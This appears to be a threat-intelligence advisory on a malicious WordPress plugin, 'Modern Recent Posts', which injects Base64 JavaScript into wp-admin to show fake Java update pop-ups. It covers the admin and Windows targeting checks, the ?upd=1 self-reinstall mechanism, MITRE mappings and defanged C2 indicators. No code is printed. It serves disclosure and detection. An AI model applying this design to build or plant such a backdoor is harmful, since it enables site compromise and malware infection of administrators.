A malicious WordPress plugin named Modern Recent Posts was found injecting Base64‑encoded JavaScript into the wp-admin dashboard to display fake browser/Java update pop-ups and force downloads from attacker-controlled domains. The campaign is served from the C2 domain persistancejs[.]store (observed on 28 sites), targets logged-in administrators on Windows, and includes a self-update/self-destruct mechanism to maintain persistence. #ModernRecentPosts #persistancejs.store
Keypoints
- The malicious plugin impersonates a benign widget called “Modern Recent Posts” and was installed without the site owner’s knowledge.
- The plugin injects a Base64-encoded JavaScript payload into the wp-admin dashboard and runs it in the administrator’s browser context.
- Delivery is targeted: the payload only executes for logged-in administrators on Windows (checks for “Windows”, “Win32”, or “Win64” and current_user_can(‘manage_options’) and is_admin()).
- The injected script displays convincing fake update overlays (e.g., “Critical Java Update Required”) that initiate forced downloads from attacker-controlled domains like secure-java-update[.]com.
- The plugin implements a remote update/persistence mechanism: a special ?upd=1 URL causes self-deletion and immediate re-download from persistancejs[.]store, enabling updates or cleanup by the attacker.
- Impact includes a persistent backdoor in WordPress and the risk of infecting administrators’ local machines with RATs, stealers, or ransomware if they click the fake update buttons.
MITRE Techniques
- [T1059.007 ] Command and Scripting Interpreter: JavaScript – The plugin injects and executes Base64-encoded JavaScript inside the admin browser, allowing arbitrary attacker-supplied script execution (‘downloads a base64-encoded JavaScript payload from the attacker’s server’).
- [T1105 ] Ingress Tool Transfer – The campaign fetches malicious code and payloads from external domains (C2/payload hosting) to the victim environment (‘download a base64-encoded JavaScript payload from the attacker’s server’).
- [T1071.001 ] Application Layer Protocol: Web Protocols – The plugin communicates with and retrieves payloads from HTTP(S) endpoints hosted at the attacker domain, e.g., persistancejs[.]store/jsplug/plugin[.]php (‘hxxps://persistancejs[.]store/jsplug/plugin[.]php’).
- [T1204.002 ] User Execution: Malicious Link – Social-engineered overlay prompts and the “UPDATE NOW” button coerce administrators into initiating a download that installs additional malware (‘Critical Java Update Required’ and the “UPDATE NOW” button triggering a forced download from secure-java-update[.]com’).
- [T1505 ] Server Software Component – The malicious plugin establishes a persistent backdoor on the WordPress server and includes a remote update/self-destruct mechanism to reinstall or update from the attacker C2 (‘the plugin deletes its own local files and directory recursively, then immediately downloads a fresh copy from the Command & Control (C2) server persistancejs[.]store’).
Indicators of Compromise
- [Domain ] C2 and payload hosting – persistancejs[.]store, secure-java-update[.]com
- [URL ] Malicious payload endpoint – hxxps://persistancejs[.]store/jsplug/plugin[.]php
- [Plugin name ] Malicious/compromised plugin installed on sites – Modern Recent Posts
- [Detection count / spread ] Evidence of active campaign – persistancejs[.]store detected on 28 websites